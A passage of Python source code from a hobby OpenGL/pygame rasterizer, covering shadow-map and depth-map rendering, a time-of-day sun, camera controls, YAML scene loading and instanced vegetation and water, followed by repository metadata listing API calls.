pygame.time.Clock()\n\n self.running = True\n\n self.meshes = []\n\n aspect = self.width / self.height\n\n self.camera = Camera(80, aspect, 0.1, 500)\n # handpicked location for the camera\n self.camera.transform.position = np.array([151.1606,-36.485424,-34.45971], \"f\")\n\n self.depthMapFBO = glGenFramebuffers(1)\n self.depthMap = glGenTextures(1)\n\n self.cameraDepthMapFBO = glGenFramebuffers(1)\n self.cameraDepthMap = glGenTextures(1)\n\n self.shadow_map_size = 4096\n\n self.sun = Light(np.array([1,1,1],\"f\"),1)\n #self.sun.transform.position = np.array([-150, 150, -150], \"f\")\n\n self.timeOfDay = 8\n\n self.calculateSun()\n\n self.skybox = Skybox()\n\n glEnable(GL_DEPTH_TEST)\n glEnable(GL_CULL_FACE)\n \n glCullFace(GL_BACK)\n\n glClearColor(0.1, 0.2, 0.3, 1.0)\n\n # enable transparency\n glEnable(GL_BLEND)\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n\n # initialize shadow map\n self.initialize_shadow_map()\n self.initialize_camera_depth_map()\n\n self.debugview = 0\n \n\n def initialize_shadow_map(self):\n \"\"\"\n Initializes the shadow map texture and framebuffer.\n \"\"\"\n glBindTexture(GL_TEXTURE_2D, self.depthMap)\n glTexImage2D(GL_TEXTURE_2D, 0, GL_DEPTH_COMPONENT, self.shadow_map_size, self.shadow_map_size, 0, GL_DEPTH_COMPONENT, GL_FLOAT, None)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_EDGE)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_EDGE)\n\n glBindFramebuffer(GL_FRAMEBUFFER, self.depthMapFBO)\n glFramebufferTexture2D(GL_FRAMEBUFFER, GL_DEPTH_ATTACHMENT, GL_TEXTURE_2D, self.depthMap, 0)\n glDrawBuffer(GL_NONE)\n glReadBuffer(GL_NONE)\n glBindFramebuffer(GL_FRAMEBUFFER, 0)\n\n def initialize_camera_depth_map(self):\n \"\"\"\n Initializes the camera depth map texture and framebuffer.\n \"\"\"\n glBindTexture(GL_TEXTURE_2D, self.cameraDepthMap)\n glTexImage2D(GL_TEXTURE_2D, 0, GL_DEPTH_COMPONENT, self.width, self.height, 0, GL_DEPTH_COMPONENT, GL_FLOAT, None)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_EDGE)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_EDGE)\n\n glBindFramebuffer(GL_FRAMEBUFFER, self.cameraDepthMapFBO)\n 
glFramebufferTexture2D(GL_FRAMEBUFFER, GL_DEPTH_ATTACHMENT, GL_TEXTURE_2D, self.cameraDepthMap, 0)\n glDrawBuffer(GL_NONE)\n glReadBuffer(GL_NONE)\n glBindFramebuffer(GL_FRAMEBUFFER, 0)\n\n\n def add_mesh(self, mesh: Mesh):\n \"\"\"\n Adds a mesh to the scene\n\n :param mesh: The mesh instance to add\n \"\"\"\n self.meshes.append(mesh)\n\n def draw_scene(self, shader: Shader):\n \"\"\"\n Draws the scene using the given shader.\n Shader needs to have a model, view and projection matrix uniform.\n\n This is used for the shadow map pass and the main draw pass, so shader is flexible.\n \n :param shader: Override shader to use for drawing\n \"\"\"\n if shader is not None:\n shader.use()\n\n for mesh in self.meshes:\n self.set_matrices(mesh, shader)\n if shader is None:\n mesh.shader.use()\n mesh.draw()\n\n def shadow_map(self):\n \"\"\"\n Renders the scene from the light's perspective to a depth map.\n \n This is used to determine which fragments are in shadow.\n \"\"\"\n global initialized\n\n #glCullFace(GL_FRONT)\n\n glBindTexture(GL_TEXTURE_2D, self.depthMap)\n glBindFramebuffer(GL_FRAMEBUFFER, self.depthMapFBO)\n\n lightProjection = self.sun.getLightProjection()\n lightView = self.sun.getLightView()\n\n lightSpaceMatrix = np.matmul(lightProjection, lightView)\n\n shadow_map_shader.use()\n glUniformMatrix4fv(shadow_map_shader.get_keyword(\"lightSpaceMatrix\"), 1, GL_TRUE, lightSpaceMatrix)\n\n glViewport(0, 0, self.shadow_map_size, self.shadow_map_size)\n glBindFramebuffer(GL_FRAMEBUFFER, self.depthMapFBO)\n glClear(GL_DEPTH_BUFFER_BIT)\n \n self.draw_scene(shadow_map_shader)\n tree_field.draw(shadow_map_trees_shader, current_time(), True, 0)\n\n # save depthMap to file\n if not initialized:\n data = glReadPixels(0, 0, self.shadow_map_size, self.shadow_map_size, GL_DEPTH_COMPONENT, GL_FLOAT)\n data = np.flip(data, 0)\n data = np.flip(data, 1)\n data = np.reshape(data, (self.shadow_map_size, self.shadow_map_size))\n data = data * 255\n data = data.astype(np.uint8)\n im = Image.fromarray(data)\n im.save(\"depthMap.png\")\n LOG(f\"Saved depthMap to file\", 3)\n initialized = True\n\n glBindFramebuffer(GL_FRAMEBUFFER, 0)\n\n #glCullFace(GL_BACK)\n\n def camera_depth(self):\n \"\"\"\n Renders the depth of the scene from the camera's perspective.\n This is used for post processing effects.\n \"\"\"\n glBindTexture(GL_TEXTURE_2D, self.cameraDepthMap)\n glBindFramebuffer(GL_FRAMEBUFFER, self.cameraDepthMapFBO)\n\n camera_depth_shader.use()\n glUniformMatrix4fv(camera_depth_shader.get_keyword(\"view\"), 1, GL_TRUE, self.camera.transform.getTRSMatrix())\n glUniformMatrix4fv(camera_depth_shader.get_keyword(\"projection\"), 1, GL_TRUE, self.camera.projectionMatrix)\n\n glViewport(0, 0, self.width, self.height)\n glBindFramebuffer(GL_FRAMEBUFFER, self.cameraDepthMapFBO)\n glClear(GL_DEPTH_BUFFER_BIT)\n\n self.draw_scene(camera_depth_shader)\n\n glBindFramebuffer(GL_FRAMEBUFFER, 0)\n\n\n # method that supplies model, view and projection matrices to the shader\n def set_matrices(self, mesh: Mesh, shader: Shader):\n \"\"\"\n Sets the model, view and projection matrices for the given shader.\n \n :param mesh: The mesh to get the model matrix from\n :param shader: The shader to set the matrices for\n \"\"\"\n shader.use()\n\n model_matrix = mesh.transform.getTRSMatrix()\n view_matrix = self.camera.getViewMatrix()\n projection_matrix = self.camera.projectionMatrix\n\n glUniformMatrix4fv(shader.get_keyword(\"model\"), 1, GL_TRUE, model_matrix)\n glUniformMatrix4fv(shader.get_keyword(\"view\"), 1, GL_TRUE, 
view_matrix)\n glUniformMatrix4fv(shader.get_keyword(\"projection\"), 1, GL_TRUE, projection_matrix)\n\n # light uniforms\n normalizedLightDir = -self.sun.transform.position / np.linalg.norm(self.sun.transform.position)\n glUniform3fv(shader.get_keyword(\"lightPos\"), 1, self.sun.transform.position)\n glUniform3fv(shader.get_keyword(\"lightDir\"), 1, normalizedLightDir)\n glUniform3fv(shader.get_keyword(\"sunColor\"), 1, self.sun.color)\n\n # light space matrix\n lightSpaceMatrix = self.sun.getLightSpaceMatrix()\n glUniformMatrix4fv(shader.get_keyword(\"lightSpaceMatrix\"), 1, GL_TRUE, lightSpaceMatrix)\n\n # shadow map (index 0)\n glActiveTexture(GL_TEXTURE0)\n glBindTexture(GL_TEXTURE_2D, self.depthMap)\n glUniform1i(shader.get_keyword(\"shadowMap\"), 0)\n\n glActiveTexture(GL_TEXTURE10)\n glBindTexture(GL_TEXTURE_CUBE_MAP, self.skybox.cubeMap)\n glUniform1i(shader.get_keyword(\"_Skybox\"), 10)\n\n glActiveTexture(GL_TEXTURE11)\n glBindTexture(GL_TEXTURE_2D, self.cameraDepthMap)\n glUniform1i(shader.get_keyword(\"cameraDepthMap\"), 11)\n\n # camera\n glUniform3fv(shader.get_keyword(\"camPos\"), 1, -self.camera.transform.position)\n glUniform3fv(shader.get_keyword(\"camFwd\"), 1, -self.camera.forward())\n\n mesh.material.use(shader)\n\n glUniform1f(shader.get_keyword(\"time\"), current_time())\n \n def set_face_culling(self, cull_face_type: int):\n \"\"\"\n Sets the face culling type.\n In most cases this should be GL_BACK, but if you want to draw the inside of a mesh, use GL_FRONT.\n \n :param cull_face_type: The face culling type\n \"\"\"\n if cull_face_type == FaceTypes.CULL_BACK:\n glEnable(GL_CULL_FACE)\n glCullFace(GL_BACK)\n elif cull_face_type == FaceTypes.CULL_FRONT:\n glEnable(GL_CULL_FACE)\n glCullFace(GL_FRONT)\n elif cull_face_type == FaceTypes.CULL_NONE:\n glDisable(GL_CULL_FACE)\n\n\n def update(self, dt: float):\n \"\"\"\n Updates the scene.\n\n :param dt: Delta time, the time since the last frame, used to make updates framerate independent\n \"\"\"\n #self.sun.transform.position = np.array([np.cos(current_time()) * 10, 2, np.sin(current_time()) * 10])\n\n self.debugView()\n\n for mesh in self.meshes:\n if mesh.isIcon:\n #mesh.transform.position = self.sun.transform.position\n #mesh.transform.lookAt(np.array([np.sin(current_time()),0,np.cos(current_time())]), np.array([0, 1, 0]))\n # rotate to look at camera\n mesh.transform.lookAtSelf(-self.camera.transform.position, np.array([0, 1, 0]))\n mesh.transform.rotateAxis(np.array([0, 1, 0]), 90)\n mesh.transform.rotateAxis(np.array([1,0,0]), -90)\n\n mesh.update(dt)\n\n self.get_mesh(\"sunIcon\").transform.position = self.sun.transform.position\n\n #self.meshes[0].transform.position = self.sun.transform.position\n\n def debugView(self):\n \"\"\"\n Allows user to click numbers from 0 to 9 to select drawing mode.\n \"\"\"\n # pygame get key pressed\n keys = pygame.key.get_pressed()\n\n key_map = {\n pygame.K_0: 0,\n pygame.K_1: 1,\n pygame.K_2: 2,\n pygame.K_3: 3,\n pygame.K_4: 4,\n pygame.K_5: 5,\n pygame.K_6: 6,\n pygame.K_7: 7,\n pygame.K_8: 8,\n pygame.K_9: 9\n }\n\n for key in key_map:\n if keys[key]:\n self.debugview = key_map[key]\n\n # plus on keypad\n if keys[pygame.K_KP_PLUS]:\n self.timeOfDay += 0.03\n self.timeOfDay %= 24\n\n self.calculateSun()\n \n # minus on keypad\n if keys[pygame.K_KP_MINUS]:\n self.timeOfDay -= 0.03\n self.timeOfDay %= 24\n\n self.calculateSun()\n\n def calculateSun(self):\n \"\"\"\n Calculates the sun's position based on the time of day. 
And the sun's color.\n \"\"\"\n\n # calculate sun position\n #self.sun.transform.position = np.array([np.cos(self.timeOfDay / 24 * 2 * np.pi) * 150, 100, np.sin(self.timeOfDay / 24 * 2 * np.pi) * 150])\n\n x = np.sin(self.timeOfDay / 24 * 2 * np.pi) * 150\n y = -np.cos(self.timeOfDay / 24 * 2 * np.pi) * 150\n z = np.cos(self.timeOfDay / 24 * 2 * np.pi) * 50\n\n # calculate sun color\n sunColor = np.array([1, 1, 1])\n\n full_bright = np.array([1, 1, 1])\n full_dark = np.array([0.1, 0.1, 0.1])\n orange = np.array([1, 0.5, 0.1])\n \n # 9 to 18, full brightness [1,1,1]\n # 18 to 22, orange [1,0.5,0]\n # 22 to 23, black\n # 23 to 24, black\n # 0 to 5, black\n # 5 to 9, orange\n \n if self.timeOfDay >= 9 and self.timeOfDay < 18:\n perc = MathUtils.InverseLerp(9, 18, self.timeOfDay)\n sunColor = full_bright\n elif self.timeOfDay >= 18 and self.timeOfDay < 22:\n perc = MathUtils.InverseLerp(18, 22, self.timeOfDay)\n sunColor = MathUtils.Lerp(full_bright, orange, perc)\n elif self.timeOfDay >= 22 and self.timeOfDay < 24:\n perc = MathUtils.InverseLerp(22, 24, self.timeOfDay)\n sunColor = MathUtils.Lerp(orange, full_dark, perc)\n elif self.timeOfDay >= 0 and self.timeOfDay < 5:\n sunColor = full_dark\n elif self.timeOfDay >= 5 and self.timeOfDay < 7:\n perc = MathUtils.InverseLerp(5, 7, self.timeOfDay)\n sunColor = MathUtils.Lerp(full_dark, orange, perc)\n elif self.timeOfDay >= 7 and self.timeOfDay < 9:\n perc = MathUtils.InverseLerp(7, 9, self.timeOfDay)\n sunColor = MathUtils.Lerp(orange, full_bright, perc)\n\n self.sun.transform.position = np.array([x,y,z])\n\n self.sun.color = sunColor\n\n\n def run(self):\n \"\"\"\n Main loop of the scene.\n\n Calculates delta time, updates the scene and draws it.\n \"\"\"\n\n while self.running:\n # handle events\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n LOG(\"Quitting...\", LogLevel.CRITICAL)\n self.running = False\n\n\n fps = self.clock.get_fps()\n dt = 1.0 if fps == 0 else 1.0 / fps\n\n ms = dt * 1000.0\n\n pygame.display.set_caption(f\"FPS: {fps:.2f} / {ms:.1f}ms\")\n\n self.cameraMovement(dt)\n self.update(dt)\n\n # MAIN DRAW LOOP\n self.shadow_map()\n self.camera_depth()\n\n # draw scene with post processing\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n self.postprocessing.before_draw(self.depthMap, self.sun, self.camera, self.cameraDepthMap)\n glViewport(0, 0, self.width, self.height)\n\n self.draw_scene(lit_shader)\n\n grass_field.draw(grass_shader, current_time(), False, self.debugview)\n tree_field.draw(grass_shader, current_time(), False, self.debugview)\n fern_field.draw(grass_shader, current_time(), False, self.debugview)\n water.draw(water_shader, self.camera, current_time(), self.sun)\n\n self.skybox.draw(skybox_shader, self.camera, self.sun)\n self.postprocessing.after_draw()\n\n # refreshing\n self.clock.tick(165)\n pygame.display.flip()\n \n def get_mesh(self, name: str) -> Mesh:\n \"\"\"\n Gets a mesh by its name.\n\n :param name: The name of the mesh\n :return: The mesh with the given name\n \"\"\"\n for mesh in self.meshes:\n if mesh.name == name:\n return mesh\n\n return None\n\n def cameraMovement(self, dt: float):\n # holding keys\n keys = pygame.key.get_pressed()\n \n # mouse delta\n mouse_delta = pygame.mouse.get_rel()\n\n # if mouse is held down\n if pygame.mouse.get_pressed()[0]:\n rotX = mouse_delta[0] * dt * 50\n rotY = mouse_delta[1] * dt * 50\n \n self.camera.rotate_local(rotY, rotX)\n\n speed = 7.0 * dt\n\n # if holding left shift speed up\n if keys[pygame.K_LSHIFT]:\n speed *= 35\n\n if 
keys[pygame.K_w]:\n self.camera.transform.position += self.camera.forward() * speed\n if keys[pygame.K_s]:\n self.camera.transform.position -= self.camera.forward() * speed\n if keys[pygame.K_a]:\n self.camera.transform.position += self.camera.right() * speed\n if keys[pygame.K_d]:\n self.camera.transform.position -= self.camera.right() * speed\n if keys[pygame.K_q]:\n self.camera.transform.position += self.camera.up() * speed\n if keys[pygame.K_e]:\n self.camera.transform.position -= self.camera.up() * speed\n\n def load_scene(self, path: str):\n \"\"\"\n Loads a scene from a file.\n \n :param path: The path to the scene file\n \"\"\"\n\n with open(path, \"r\") as scene:\n scene_data = yaml.safe_load(scene)\n\n materials = {}\n\n # fetch materials\n for material_name in scene_data[\"Materials\"]:\n material_data = scene_data[\"Materials\"][material_name]\n \n texture_data = material_data[\"textures\"]\n\n tiling = np.array(material_data[\"tiling\"])\n\n mat = Material()\n mat.name = material_name\n\n mat.tiling = tiling\n\n mat.shader = lit_shader\n\n mat.ambient = material_data[\"ambient\"]\n mat.diffuse = material_data[\"diffuse\"]\n mat.specular = material_data[\"specular\"]\n mat.specularExponent = material_data[\"specularExponent\"]\n mat.metallic = material_data[\"metallic\"]\n\n if \"tiling_speed\" in material_data:\n mat.tiling_speed = material_data[\"tiling_speed\"]\n\n for tex_name, tex_path in texture_data.items():\n tex = Texture.Load(tex_path)\n mat.add_texture(tex, tex_name)\n\n materials[material_name] = mat\n \n\n # fetch meshes\n for mesh_name in scene_data[\"Meshes\"]:\n mesh_data = scene_data[\"Meshes\"][mesh_name]\n \n mesh = blender.load_mesh(mesh_data[\"path\"])\n mesh.name = mesh_name\n \n mat_name = mesh_data[\"material\"]\n mesh.set_material(materials[mat_name])\n\n mesh.transform.position = mesh_data[\"position\"]\n\n rotX, rotY, rotZ = mesh_data[\"rotation\"]\n mesh.transform.rotation = Quaternion.FromEuler(rotX, rotY, rotZ)\n\n mesh.transform.scale = mesh_data[\"scale\"]\n\n recalculate_normals = mesh_data[\"recalculateNormals\"]\n if recalculate_normals:\n mesh.recalculate_normals()\n\n if \"isIcon\" in mesh_data:\n mesh.isIcon = mesh_data[\"isIcon\"]\n else:\n mesh.isIcon = False\n\n if \"scripts\" in mesh_data:\n for script in mesh_data[\"scripts\"]:\n mesh.add_script(script)\n\n if \"one_time_scripts\" in mesh_data:\n scripts = mesh_data[\"one_time_scripts\"]\n for script in scripts:\n LOG(f\"Running one time script {script} on {mesh_name}\", LogLevel.INFO)\n program = Programs[script]\n program(mesh)\n\n self.meshes.append(mesh)\n \n\ndef current_time():\n \"\"\"\n Returns the time since the program started in seconds.\n Used for animations inside shaders.\n\n :return: The time since the program started in seconds\n \"\"\"\n return time.time() - start_time\n\n\nscene = Scene()\n\n# initialize basic shaders\nshadow_map_shader = Shader.Shader(\"shaders/shadow_map/shadow_vertex.glsl\", \"shaders/shadow_map/shadow_fragment.glsl\")\nlit_shader = Shader.Shader(\"shaders/basic/vertex.glsl\", \"shaders/basic/fragment.glsl\")\nskybox_shader = Shader.Shader(\"shaders/skybox/vertex.glsl\", \"shaders/skybox/fragment.glsl\")\npostprocess_shader = Shader.Shader(\"shaders/postprocess/vertex.glsl\", \"shaders/postprocess/fragment.glsl\")\ncamera_depth_shader = Shader.Shader(\"shaders/camera/camera_depth_vertex.glsl\", \"shaders/camera/camera_depth_fragment.glsl\")\ngrass_shader = Shader.Shader(\"shaders/grass/vertex.glsl\", 
\"shaders/grass/fragment.glsl\")\nshadow_map_trees_shader = Shader.Shader(\"shaders/grass/vertex.glsl\", \"shaders/shadow_map/shadow_fragment.glsl\")\nwater_shader = Shader.Shader(\"shaders/water/vertex.glsl\", \"shaders/water/fragment.glsl\")\n\nscene.postprocessing = PostProcessing(postprocess_shader, scene.width, scene.height)\n\nscene.load_scene(\"scene.yaml\")\n\n# calculated manually inside perlin noise generator for a given seed.\nworldYBounds = np.array([-40.0, 22.067507434821415])\n\ngrass_field = InstancedField()\ngrass_field.setup(scene.camera, \n scene.sun,\n worldYBounds,\n blender.load_mesh(\"models/jungle/grass_high.obj\"),\n Texture.Load(\"textures/grass/color.jpg\"),\n Texture.Load(\"textures/grass/opacity.jpg\"),\n Texture.Load(\"textures/grass/normal.png\"),\n 500_000, 0.5)\n\ngrass_field.shadowMap = scene.depthMap\n\ntree_field = InstancedField()\ntree_field.setup(scene.camera,\n scene.sun,\n worldYBounds,\n blender.load_mesh(\"models/jungle/tree_low.obj\"),\n Texture.Load(\"textures/tree/tree_albedo.png\"),\n None,\n Texture.Load(\"textures/tree/tree_normal.png\"),\n 25, 0.5)\n\ntree_field.shadowMap = scene.depthMap\n\nfern_field = InstancedField()\nfern_field.setup(scene.camera,\n scene.sun,\n worldYBounds,\n blender.load_mesh(\"models/jungle/fern.obj\"),\n Texture.Load(\"textures/Fern/color.jpg\"),\n Texture.Load(\"textures/Fern/opacity.jpg\"),\n Texture.Load(\"textures/Fern/normal.png\"),\n 1_000, 0.5)\n\nfern_field.shadowMap = scene.depthMap\n\nwater = Water(np.array([0, -2, 0]), np.array([200,200,200]), scene.skybox)\n\nscene.run()", "repo_name": "killereks/3D-experiments", "sub_path": "Proper Rasterizer/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 22465, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "time.time", "line_number": 40, "usage_type": "call"}, {"api_name": "pygame.init", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 51, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pygame.OPENGL", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pygame.DOUBLEBUF", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 53, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 53, "usage_type": "attribute"}, {"api_name": "Camera.Camera", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "Skybox.Skybox", "line_number": 80, "usage_type": "call"}, {"api_name": "Mesh.Mesh", "line_number": 135, "usage_type": "name"}, {"api_name": "numpy.matmul", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 195, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 196, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 196, "usage_type": "name"}, {"api_name": "custom_logging.LOG", "line_number": 198, "usage_type": "call"}, {"api_name": "Mesh.Mesh", "line_number": 227, "usage_type": "name"}, {"api_name": "numpy.linalg.norm", "line_number": 245, "usage_type": "call"}, 
{"api_name": "numpy.linalg", "line_number": 245, "usage_type": "attribute"}, {"api_name": "Material.FaceTypes.CULL_BACK", "line_number": 282, "usage_type": "attribute"}, {"api_name": "Material.FaceTypes", "line_number": 282, "usage_type": "name"}, {"api_name": "Material.FaceTypes.CULL_FRONT", "line_number": 285, "usage_type": "attribute"}, {"api_name": "Material.FaceTypes", "line_number": 285, "usage_type": "name"}, {"api_name": "Material.FaceTypes.CULL_NONE", "line_number": 288, "usage_type": "attribute"}, {"api_name": "Material.FaceTypes", "line_number": 288, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 309, "usage_type": "call"}, {"api_name": "pygame.key.get_pressed", "line_number": 322, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 322, "usage_type": "attribute"}, {"api_name": "pygame.K_0", "line_number": 325, "usage_type": "attribute"}, {"api_name": "pygame.K_1", "line_number": 326, "usage_type": "attribute"}, {"api_name": "pygame.K_2", "line_number": 327, "usage_type": "attribute"}, {"api_name": "pygame.K_3", "line_number": 328, "usage_type": "attribute"}, {"api_name": "pygame.K_4", "line_number": 329, "usage_type": "attribute"}, {"api_name": "pygame.K_5", "line_number": 330, "usage_type": "attribute"}, {"api_name": "pygame.K_6", "line_number": 331, "usage_type": "attribute"}, {"api_name": "pygame.K_7", "line_number": 332, "usage_type": "attribute"}, {"api_name": "pygame.K_8", "line_number": 333, "usage_type": "attribute"}, {"api_name": "pygame.K_9", "line_number": 334, "usage_type": "attribute"}, {"api_name": "pygame.K_KP_PLUS", "line_number": 342, "usage_type": "attribute"}, {"api_name": "pygame.K_KP_MINUS", "line_number": 349, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 363, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 364, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 364, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 365, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 365, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 372, "usage_type": "call"}, {"api_name": "MathUtils.InverseLerp", "line_number": 382, "usage_type": "call"}, {"api_name": "MathUtils.InverseLerp", "line_number": 385, "usage_type": "call"}, {"api_name": "MathUtils.Lerp", "line_number": 386, "usage_type": "call"}, {"api_name": "MathUtils.InverseLerp", "line_number": 388, "usage_type": "call"}, {"api_name": "MathUtils.Lerp", "line_number": 389, "usage_type": "call"}, {"api_name": "MathUtils.InverseLerp", "line_number": 393, "usage_type": "call"}, {"api_name": "MathUtils.Lerp", "line_number": 394, "usage_type": "call"}, {"api_name": "MathUtils.InverseLerp", "line_number": 396, "usage_type": "call"}, {"api_name": "MathUtils.Lerp", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 399, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 413, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 413, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 
414, "usage_type": "attribute"}, {"api_name": "custom_logging.LOG", "line_number": 415, "usage_type": "call"}, {"api_name": "custom_logging.LogLevel.CRITICAL", "line_number": 415, "usage_type": "attribute"}, {"api_name": "custom_logging.LogLevel", "line_number": 415, "usage_type": "name"}, {"api_name": "pygame.display.set_caption", "line_number": 424, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 424, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 450, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 450, "usage_type": "attribute"}, {"api_name": "Mesh.Mesh", "line_number": 452, "usage_type": "name"}, {"api_name": "pygame.key.get_pressed", "line_number": 467, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 467, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_rel", "line_number": 470, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 470, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pressed", "line_number": 473, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 473, "usage_type": "attribute"}, {"api_name": "pygame.K_LSHIFT", "line_number": 482, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 485, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 487, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 489, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 491, "usage_type": "attribute"}, {"api_name": "pygame.K_q", "line_number": 493, "usage_type": "attribute"}, {"api_name": "pygame.K_e", "line_number": 495, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 506, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 516, "usage_type": "call"}, {"api_name": "Material.Material", "line_number": 518, "usage_type": "call"}, {"api_name": "Texture.Texture.Load", "line_number": 535, "usage_type": "call"}, {"api_name": "Texture.Texture", "line_number": 535, "usage_type": "name"}, {"api_name": "blender.load_mesh", "line_number": 545, "usage_type": "call"}, {"api_name": "Quaternion.Quaternion.FromEuler", "line_number": 554, "usage_type": "call"}, {"api_name": "Quaternion.Quaternion", "line_number": 554, "usage_type": "name"}, {"api_name": "custom_logging.LOG", "line_number": 574, "usage_type": "call"}, {"api_name": "custom_logging.LogLevel.INFO", "line_number": 574, "usage_type": "attribute"}, {"api_name": "custom_logging.LogLevel", "line_number": 574, "usage_type": "name"}, {"api_name": "Programs.Programs", "line_number": 575, "usage_type": "name"}, {"api_name": "time.time", "line_number": 588, "usage_type": "call"}, {"api_name": "Shader.Shader", "line_number": 594, "usage_type": "call"}, {"api_name": "Shader.Shader", "line_number": 595, "usage_type": "call"}, {"api_name": "Shader.Shader", "line_number": 596, "usage_type": "call"}, {"api_name": "Shader.Shader", "line_number": 597, "usage_type": "call"}, {"api_name": "Shader.Shader", "line_number": 598, "usage_type": "call"}, {"api_name": "Shader.Shader", "line_number": 599, "usage_type": "call"}, {"api_name": "Shader.Shader", "line_number": 600, "usage_type": "call"}, {"api_name": "Shader.Shader", "line_number": 601, "usage_type": "call"}, {"api_name": "PostProcessing.PostProcessing", "line_number": 603, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 608, "usage_type": "call"}, {"api_name": "InstancedField.InstancedField", "line_number": 610, "usage_type": "call"}, 
{"api_name": "blender.load_mesh", "line_number": 614, "usage_type": "call"}, {"api_name": "Texture.Texture.Load", "line_number": 615, "usage_type": "call"}, {"api_name": "Texture.Texture", "line_number": 615, "usage_type": "name"}, {"api_name": "Texture.Texture.Load", "line_number": 616, "usage_type": "call"}, {"api_name": "Texture.Texture", "line_number": 616, "usage_type": "name"}, {"api_name": "Texture.Texture.Load", "line_number": 617, "usage_type": "call"}, {"api_name": "Texture.Texture", "line_number": 617, "usage_type": "name"}, {"api_name": "InstancedField.InstancedField", "line_number": 622, "usage_type": "call"}, {"api_name": "blender.load_mesh", "line_number": 626, "usage_type": "call"}, {"api_name": "Texture.Texture.Load", "line_number": 627, "usage_type": "call"}, {"api_name": "Texture.Texture", "line_number": 627, "usage_type": "name"}, {"api_name": "Texture.Texture.Load", "line_number": 629, "usage_type": "call"}, {"api_name": "Texture.Texture", "line_number": 629, "usage_type": "name"}, {"api_name": "InstancedField.InstancedField", "line_number": 634, "usage_type": "call"}, {"api_name": "blender.load_mesh", "line_number": 638, "usage_type": "call"}, {"api_name": "Texture.Texture.Load", "line_number": 639, "usage_type": "call"}, {"api_name": "Texture.Texture", "line_number": 639, "usage_type": "name"}, {"api_name": "Texture.Texture.Load", "line_number": 640, "usage_type": "call"}, {"api_name": "Texture.Texture", "line_number": 640, "usage_type": "name"}, {"api_name": "Texture.Texture.Load", "line_number": 641, "usage_type": "call"}, {"api_name": "Texture.Texture", "line_number": 641, "usage_type": "name"}, {"api_name": "Water.Water", "line_number": 646, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 646, "usage_type": "call"}]}
